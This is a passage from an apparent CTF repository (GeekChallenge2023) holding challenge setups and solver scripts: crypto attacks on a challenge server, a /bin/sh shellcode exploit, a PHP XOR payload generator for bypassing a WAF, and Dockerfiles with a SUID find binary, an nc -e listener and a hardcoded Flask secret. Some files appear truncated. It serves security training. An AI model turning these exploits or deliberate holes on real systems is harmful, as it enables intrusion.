7773771229298328019250652625289700950165414584983487319078090573179470893450632419467111117341472 5 | 6 | 7 | e = 65537 8 | d = gp.invert(e,p-1) 9 | print(long_to_bytes(gp.powmod(c,d,p))) 10 | # b'SYC{Just_a_s1mple_modular_equation}' 11 | -------------------------------------------------------------------------------- /Crypto/card_game/card_game_setup.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Crypto/card_game/card_game_setup.zip -------------------------------------------------------------------------------- /Crypto/card_game/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | from Crypto.Util.number import * 3 | from functools import reduce 4 | from cards import Heart, Spade, Club, Diamond 5 | import gmpy2 6 | 7 | def choose_card(num): 8 | x = (num>>5)%4 9 | if x == 0: 10 | return 'Heart_'+Heart[(num>>6)%13][15] 11 | if x%4 == 1: 12 | return 'Spade_'+Spade[(num>>6)%13][15] 13 | if x%4 == 2: 14 | return 'Diamond_'+Diamond[(num>>6)%13][15] 15 | else: 16 | return 'Club_'+Club[(num>>6)%13][15] 17 | 18 | def attack(gift_list): 19 | diffs = [s1 - s0 for s0, s1 in zip(gift_list, gift_list[1:])] 20 | zeroes = [t2*t0 - t1*t1 for t0, t1, t2 in zip(diffs, diffs[1:], diffs[2:])] 21 | n = int(abs(reduce(gmpy2.gcd, zeroes))) 22 | m = (gift_list[2] - gift_list[1]) * inverse(gift_list[1] - gift_list[0], n) % n 23 | c = (gift_list[1] - gift_list[0]*m) % n 24 | return n, m, c 25 | 26 | sh = remote("59.110.20.54","4953") 27 | sh.recvuntil(b'input your option:') 28 | sh.send(b'1\n') 29 | data = sh.recvuntil(b'round:4') 30 | crack_list = [] 31 | 32 | gift_matches = re.findall(r'gift: \[(.*?)\]', data.decode()) 33 | for gift_match in gift_matches: 34 | for num in gift_match.split(','): 35 | crack_list.append(int(num)) 36 | print(f'Crack List: {crack_list}') 37 | lcg = [] 38 | res = [] 39 | n, m, c = attack(crack_list) 40 | output = crack_list[-1] 41 | 42 | for i in range(150): 43 | output = (output*m+c)%n 44 | lcg.append(output) 45 | for num in lcg: 46 | data = choose_card(num) 47 | res.append(data) 48 | res_t = [res[i:i+3] for i in range(0, len(res), 3)] 49 | for datas in res_t: 50 | sh.recvuntil(b'Give me your guess: (example: Heart_1 Club_2 Diamond_3)\n') 51 | data = " ".join(datas) 52 | print(data) 53 | sh.send(data.encode()+b'\n') 54 | 55 | sh.recvuntil(b'The flag is your reward!\n') 56 | flag = sh.recvline().decode() 57 | print(flag) 58 | # SYC{lcg_a@@@@@ttack} -------------------------------------------------------------------------------- /Crypto/easy_classic/cipher_1.txt: -------------------------------------------------------------------------------- 1 | udzeojxuwqcu -------------------------------------------------------------------------------- /Crypto/easy_classic/加油~.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Crypto/easy_classic/加油~.zip -------------------------------------------------------------------------------- /Crypto/ext^7gcd/exp.py: -------------------------------------------------------------------------------- 1 | from sage.all import * 2 | from pwn import * 3 | from Crypto.Util.number import * 4 | from hashlib import sha256 5 | from itertools import product 6 | import string 7 | 8 | table = string.ascii_letters+string.digits 9 | rec = remote('59.110.20.54', int(1789)) 10 | _ = rec.recvuntil(b'XXXX:') 11 | tail,h = _[12:28],_[33:97] 12 | for head in product(table,repeat=4): 13 | m = "".join(head)+tail.decode() 14 | h_ = sha256(m.encode()) 15 | if h_.hexdigest() == h.decode(): 16 | print('find!') 17 | break 18 | rec.sendline("".join(head).encode()) 19 | 20 | 21 | try: 22 | while True: 23 | _ = rec.recvuntil(b"a6:").split(b'\n')[-2].split(b']') 24 | ps, bts = eval(_[0][9:].decode()+']'), eval(_[1][3:-7].decode()) 25 | print(ps) 26 | n = len(ps) 27 | S = 2**bts 28 | X = Matrix(ZZ, n, n + 1) 29 | for i in range(n): 30 | X[i, i + 1] = 1 31 | for i in range(n): 32 | X[i, 0] = S * ps[i] 33 | 34 | L = X.LLL() 35 | 36 | M = L.row(n-1).list()[1:] 37 | if add(ps[i]*M[i] for i in range(n)) != 1: 38 | for i in range(n): 39 | M[i] = M[i]*(-1) 40 | print(add(ps[i]*M[i] for i in range(n))) 41 | M = str(M)[1:-1].encode() 42 | print(M) 43 | rec.sendline(M) 44 | except Exception: 45 | print(rec.recvall()) 46 | 47 | 48 | # SYC{N0t_s0_e4sy_3xtgCd}\n -------------------------------------------------------------------------------- /Crypto/ext^7gcd/ext^7gcd_setup.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Crypto/ext^7gcd/ext^7gcd_setup.zip -------------------------------------------------------------------------------- /Crypto/proof_of_work/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | from Crypto.Util.number import * 3 | from hashlib import sha256 4 | from itertools import product 5 | import string 6 | 7 | table = string.ascii_letters+string.digits 8 | rec = remote('59.110.20.54', int(5526)) 9 | 10 | _ = rec.recvuntil(b'XXXX:') 11 | tail,h = _[83:83+16],_[104:104+64] 12 | for head in product(table,repeat=4): 13 | m = "".join(head)+tail.decode() 14 | h_ = sha256(m.encode()) 15 | if h_.hexdigest() == h.decode(): 16 | print("".join(head)) 17 | break 18 | rec.sendline("".join(head).encode()) 19 | print(rec.recvall()) -------------------------------------------------------------------------------- /Crypto/proof_of_work/proof_of_work_setup.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Crypto/proof_of_work/proof_of_work_setup.zip -------------------------------------------------------------------------------- /Misc/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Misc/.gitkeep -------------------------------------------------------------------------------- /Misc/xqr/make/mk.py: -------------------------------------------------------------------------------- 1 | from PIL import Image 2 | 3 | def mk_png2bit(filename, length): 4 | pic = Image.open(filename) 5 | pic.convert('1') 6 | bit = [] 7 | for y in range(length): 8 | for x in range(length): 9 | bit.append(0 if pic.getpixel((x, y))[0] == 255 else 1) 10 | return bit 11 | 12 | def mk_bit2png(filename, length, bit): 13 | pic = Image.new("RGB",(length, length)) 14 | i=0 15 | for y in range (length): 16 | for x in range (length): 17 | if(bit[i] == 1): 18 | pic.putpixel([x,y],(0, 0, 0)) 19 | else: 20 | pic.putpixel([x,y],(255,255,255)) 21 | i+=1 22 | pic.save(filename) 23 | 24 | flag_bit = mk_png2bit("qr_code_syc_hop3.png", 25) 25 | xor_bit = mk_png2bit("qr_code_syc_this.png", 25) 26 | 27 | for i in range(625): 28 | xor_bit[i]^=flag_bit[i] 29 | 30 | mk_bit2png("out.png", 25, xor_bit) -------------------------------------------------------------------------------- /Misc/xqr/make/qr_code_syc_hop3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Misc/xqr/make/qr_code_syc_hop3.png -------------------------------------------------------------------------------- /Misc/xqr/make/qr_code_syc_this.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Misc/xqr/make/qr_code_syc_this.png -------------------------------------------------------------------------------- /Misc/xqr/toCTFer/xqr.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Misc/xqr/toCTFer/xqr.zip -------------------------------------------------------------------------------- /Pwn/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/.gitkeep -------------------------------------------------------------------------------- /Pwn/EVA/EVA: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/EVA/EVA -------------------------------------------------------------------------------- /Pwn/EVA/ld-2.31.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/EVA/ld-2.31.so -------------------------------------------------------------------------------- /Pwn/EVA/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/EVA/libc.so.6 -------------------------------------------------------------------------------- /Pwn/elevator/elevator: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/elevator/elevator -------------------------------------------------------------------------------- /Pwn/elevator/ld-2.31.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/elevator/ld-2.31.so -------------------------------------------------------------------------------- /Pwn/elevator/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/elevator/libc.so.6 -------------------------------------------------------------------------------- /Pwn/ez_fullprotection/ez_fullprotection: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/ez_fullprotection/ez_fullprotection -------------------------------------------------------------------------------- /Pwn/ez_fullprotection/ld-2.31.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/ez_fullprotection/ld-2.31.so -------------------------------------------------------------------------------- /Pwn/ez_fullprotection/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/ez_fullprotection/libc.so.6 -------------------------------------------------------------------------------- /Pwn/ezpwn/docker/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04 2 | 3 | COPY ./start.sh /start.sh 4 | COPY ./run.sh /run.sh 5 | COPY ./busybox /busybox 6 | ADD ./bins/ /home/ctf/ 7 | 8 | RUN sed -i "s/http:\/\/archive.ubuntu.com/http:\/\/mirrors.tuna.tsinghua.edu.cn/g" /etc/apt/sources.list && \ 9 | sed -i "s/http:\/\/security.ubuntu.com/http:\/\/mirrors.tuna.tsinghua.edu.cn/g" /etc/apt/sources.list && \ 10 | apt-get update && apt-get -y dist-upgrade && \ 11 | apt-get install -y lib32z1 && \ 12 | useradd -m ctf && \ 13 | chmod 700 /start.sh /run.sh /busybox && \ 14 | echo "flag{default_flag}" > /home/ctf/flag && \ 15 | mkdir /home/ctf/bin /home/ctf/lib /home/ctf/lib64 /home/ctf/usr && \ 16 | cp -ruf /lib/ /home/ctf/ && \ 17 | cp -ruf /lib64/ /home/ctf/ && \ 18 | cp /usr/bin/sh /usr/bin/ls /usr/bin/cat /home/ctf/bin/ && \ 19 | chown -R root:ctf /home/ctf && \ 20 | chmod -R 750 /home/ctf && \ 21 | chmod 740 /home/ctf/flag 22 | 23 | WORKDIR /home/ctf 24 | 25 | CMD ["/start.sh"] 26 | 27 | EXPOSE 2333 28 | -------------------------------------------------------------------------------- /Pwn/ezpwn/docker/bins/pwn: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/ezpwn/docker/bins/pwn -------------------------------------------------------------------------------- /Pwn/ezpwn/docker/busybox: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/ezpwn/docker/busybox -------------------------------------------------------------------------------- /Pwn/ezpwn/docker/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # Your program should be placed in /home/ctf 3 | # We use proot for isolating, make /home/ctf as root dir. 4 | # Replace the "helloworld" with your filename 5 | #cd /home/ctf && su ctf -c "/bin/qemu-mipsel-static -L /usr/mipsel-linux-gnu ./pwn" 6 | chroot --userspec=1000:1000 /home/ctf ./pwn 7 | -------------------------------------------------------------------------------- /Pwn/ezpwn/docker/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # container startup script 3 | # DO NOT EDIT 4 | echo $geek_flag>/home/ctf/flag 5 | export FLAG='' 6 | FLAG='' 7 | /busybox nc -lkp 2333 -v -e /run.sh 8 | #sleep infinity; 9 | -------------------------------------------------------------------------------- /Pwn/ezpwn/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | context.arch = "amd64" 3 | payload = b"/bin/sh\0" 4 | payload += asm( 5 | """ 6 | xor al, 0x28 7 | mov rdi, rsp 8 | xor esi, esi 9 | xor edx, edx 10 | syscall 11 | """ 12 | ) 13 | p = process("./pwn") 14 | p.send(payload) 15 | p.interactive() -------------------------------------------------------------------------------- /Pwn/fmt1.0/fmt1.0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/fmt1.0/fmt1.0 -------------------------------------------------------------------------------- /Pwn/fmt1.0/ld-2.31.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/fmt1.0/ld-2.31.so -------------------------------------------------------------------------------- /Pwn/fmt1.0/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/fmt1.0/libc.so.6 -------------------------------------------------------------------------------- /Pwn/fmt2.0/fmt2.0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/fmt2.0/fmt2.0 -------------------------------------------------------------------------------- /Pwn/fmt2.0/ld-2.31.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/fmt2.0/ld-2.31.so -------------------------------------------------------------------------------- /Pwn/fmt2.0/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/fmt2.0/libc.so.6 -------------------------------------------------------------------------------- /Pwn/fmt3.0/fmt3.0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/fmt3.0/fmt3.0 -------------------------------------------------------------------------------- /Pwn/fmt3.0/ld-2.31.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/fmt3.0/ld-2.31.so -------------------------------------------------------------------------------- /Pwn/fmt3.0/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/fmt3.0/libc.so.6 -------------------------------------------------------------------------------- /Pwn/mips/mips.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/mips/mips.zip -------------------------------------------------------------------------------- /Pwn/nc_pwntools/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/nc_pwntools/chal -------------------------------------------------------------------------------- /Pwn/password/password: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/password/password -------------------------------------------------------------------------------- /Pwn/ret2libc/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/ret2libc/chal -------------------------------------------------------------------------------- /Pwn/ret2libc/ld-linux-x86-64.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/ret2libc/ld-linux-x86-64.so.2 -------------------------------------------------------------------------------- /Pwn/ret2libc/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/ret2libc/libc.so.6 -------------------------------------------------------------------------------- /Pwn/ret2text/ret2text: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/ret2text/ret2text -------------------------------------------------------------------------------- /Pwn/white_canary/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/white_canary/chal -------------------------------------------------------------------------------- /Pwn/white_canary/ld-linux-x86-64.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/white_canary/ld-linux-x86-64.so.2 -------------------------------------------------------------------------------- /Pwn/white_canary/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/white_canary/libc.so.6 -------------------------------------------------------------------------------- /Pwn/why_n0t_puts/ld-2.31.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/why_n0t_puts/ld-2.31.so -------------------------------------------------------------------------------- /Pwn/why_n0t_puts/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/why_n0t_puts/libc.so.6 -------------------------------------------------------------------------------- /Pwn/why_n0t_puts/why_n0t_puts: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/why_n0t_puts/why_n0t_puts -------------------------------------------------------------------------------- /Pwn/write1/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/write1/chal -------------------------------------------------------------------------------- /Pwn/write_2/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Pwn/write_2/chal -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # GeekChallenge2023 2 | 3 | 极客大挑战官方题目 -------------------------------------------------------------------------------- /Re/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Re/.gitkeep -------------------------------------------------------------------------------- /Re/AES?AES!/AES.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Re/AES?AES!/AES.zip -------------------------------------------------------------------------------- /Re/ezandroid/ezandroid.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Re/ezandroid/ezandroid.apk -------------------------------------------------------------------------------- /Re/flower-or-tea/flower-or-tea.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Re/flower-or-tea/flower-or-tea.zip -------------------------------------------------------------------------------- /Re/mySelf/因何存在.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Re/mySelf/因何存在.zip -------------------------------------------------------------------------------- /Re/rainbow/rainbow.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Re/rainbow/rainbow.tar.gz -------------------------------------------------------------------------------- /Re/shiftjmp/shiftjmp.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Re/shiftjmp/shiftjmp.zip -------------------------------------------------------------------------------- /Re/yakvm/yakvm_geek2023.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Re/yakvm/yakvm_geek2023.zip -------------------------------------------------------------------------------- /Re/听说cpp很难/听说cpp很难.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Re/听说cpp很难/听说cpp很难.zip -------------------------------------------------------------------------------- /Re/寻找初音未来/寻找初音未来.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Re/寻找初音未来/寻找初音未来.zip -------------------------------------------------------------------------------- /Re/小黄鸭/小黄鸭.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Re/小黄鸭/小黄鸭.zip -------------------------------------------------------------------------------- /Re/幸运数字/幸运数字.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Re/幸运数字/幸运数字.exe -------------------------------------------------------------------------------- /Re/点击就送的逆向题/点击就送的逆向题.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Re/点击就送的逆向题/点击就送的逆向题.zip -------------------------------------------------------------------------------- /Re/砍树/砍树.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Re/砍树/砍树.apk -------------------------------------------------------------------------------- /Web/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Web/.gitkeep -------------------------------------------------------------------------------- /Web/EzRce/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM safoorsafdar/php-7.4.16-apache-buster 2 | 3 | COPY ./src/ /var/www/html/ 4 | COPY ./sources.list /etc/apt/ 5 | COPY ./flag /flag 6 | 7 | RUN chmod 777 -R /var/www/html/ && chmod 400 /flag && chmod u+s /usr/bin/find -------------------------------------------------------------------------------- /Web/EzRce/flag: -------------------------------------------------------------------------------- 1 | SYC{ThE_RCe_is_S0_Eas1ly_DD!} -------------------------------------------------------------------------------- /Web/EzRce/sources.list: -------------------------------------------------------------------------------- 1 | deb http://mirrors.aliyun.com/debian/ buster main non-free contrib 2 | deb-src http://mirrors.aliyun.com/debian/ buster main non-free contrib 3 | deb http://mirrors.aliyun.com/debian-security buster/updates main 4 | deb-src http://mirrors.aliyun.com/debian-security buster/updates main 5 | deb http://mirrors.aliyun.com/debian/ buster-updates main non-free contrib 6 | deb-src http://mirrors.aliyun.com/debian/ buster-updates main non-free contrib 7 | deb http://mirrors.aliyun.com/debian/ buster-backports main non-free contrib 8 | deb-src http://mirrors.aliyun.com/debian/ buster-backports main non-free contrib -------------------------------------------------------------------------------- /Web/EzRce/src/index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Web/EzRce/src/waf.php: -------------------------------------------------------------------------------- 1 | =32&ord($c)<=126) { 32 | $contents=$contents.$c." ".$a." ".$b."\n"; 33 | } 34 | } 35 | 36 | } 37 | } 38 | fwrite($myfile,$contents); 39 | fclose($myfile); -------------------------------------------------------------------------------- /Web/EzRce/wp/1.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | # author yu22x 4 | 5 | import requests 6 | import urllib 7 | from sys import * 8 | import os 9 | def action(arg): 10 | s1="" 11 | s2="" 12 | for i in arg: 13 | f=open("xor_rce.txt","r") 14 | while True: 15 | t=f.readline() 16 | if t=="": 17 | break 18 | if t[0]==i: 19 | #print(i) 20 | s1+=t[2:5] 21 | s2+=t[6:9] 22 | break 23 | f.close() 24 | output="(\""+s1+"\"^\""+s2+"\")" 25 | return(output) 26 | 27 | while True: 28 | param=action(input("\n[+] your function:") )+action(input("[+] your command:"))+";" 29 | print(param) -------------------------------------------------------------------------------- /Web/ezpython/.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # 默认忽略的文件 2 | /shelf/ 3 | /workspace.xml 4 | # 基于编辑器的 HTTP 客户端请求 5 | /httpRequests/ 6 | # Datasource local storage ignored files 7 | /dataSources/ 8 | /dataSources.local.xml 9 | -------------------------------------------------------------------------------- /Web/ezpython/.idea/inspectionProfiles/profiles_settings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 6 | -------------------------------------------------------------------------------- /Web/ezpython/.idea/jike1.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 15 | 16 | -------------------------------------------------------------------------------- /Web/ezpython/.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Web/ezpython/.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Web/ezpython/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python 2 | 3 | COPY ./src /app/ 4 | COPY start.sh / 5 | 6 | RUN pip install --upgrade pip -i https://pypi.tuna.tsinghua.edu.cn/simple 7 | 8 | RUN pip install -r /app/requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple 9 | 10 | RUN chmod -R 777 /start.sh 11 | 12 | ENTRYPOINT ./start.sh 13 | 14 | EXPOSE 8888 15 | 16 | -------------------------------------------------------------------------------- /Web/ezpython/src/.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # 默认忽略的文件 2 | /shelf/ 3 | /workspace.xml 4 | # 基于编辑器的 HTTP 客户端请求 5 | /httpRequests/ 6 | # Datasource local storage ignored files 7 | /dataSources/ 8 | /dataSources.local.xml 9 | -------------------------------------------------------------------------------- /Web/ezpython/src/.idea/inspectionProfiles/profiles_settings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 6 | -------------------------------------------------------------------------------- /Web/ezpython/src/.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Web/ezpython/src/.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Web/ezpython/src/.idea/src.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 18 | 19 | -------------------------------------------------------------------------------- /Web/ezpython/src/__pycache__/app.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Web/ezpython/src/__pycache__/app.cpython-311.pyc -------------------------------------------------------------------------------- /Web/ezpython/src/__pycache__/test.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Web/ezpython/src/__pycache__/test.cpython-311.pyc -------------------------------------------------------------------------------- /Web/ezpython/src/__pycache__/waf.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Web/ezpython/src/__pycache__/waf.cpython-311.pyc -------------------------------------------------------------------------------- /Web/ezpython/src/app.py: -------------------------------------------------------------------------------- 1 | import json 2 | import os 3 | 4 | from waf import waf 5 | import importlib 6 | from flask import Flask,render_template,request,redirect,url_for,session,render_template_string 7 | 8 | app = Flask(__name__) 9 | app.secret_key='jjjjggggggreekchallenge202333333' 10 | class User(): 11 | def __init__(self): 12 | self.username="" 13 | self.password="" 14 | self.isvip=False 15 | 16 | 17 | class hhh(User): 18 | def __init__(self): 19 | self.username="" 20 | self.password="" 21 | 22 | registered_users=[] 23 | @app.route('/') 24 | def hello_world(): # put application's code here 25 | return render_template("welcome.html") 26 | 27 | @app.route('/play') 28 | def play(): 29 | username=session.get('username') 30 | if username: 31 | return render_template('index.html',name=username) 32 | else: 33 | return redirect(url_for('login')) 34 | 35 | @app.route('/login',methods=['GET','POST']) 36 | def login(): 37 | if request.method == 'POST': 38 | username=request.form.get('username') 39 | password=request.form.get('password') 40 | user = next((user for user in registered_users if user.username == username and user.password == password), None) 41 | if user: 42 | session['username'] = user.username 43 | session['password']=user.password 44 | return redirect(url_for('play')) 45 | else: 46 | return "Invalid login" 47 | return redirect(url_for('play')) 48 | return 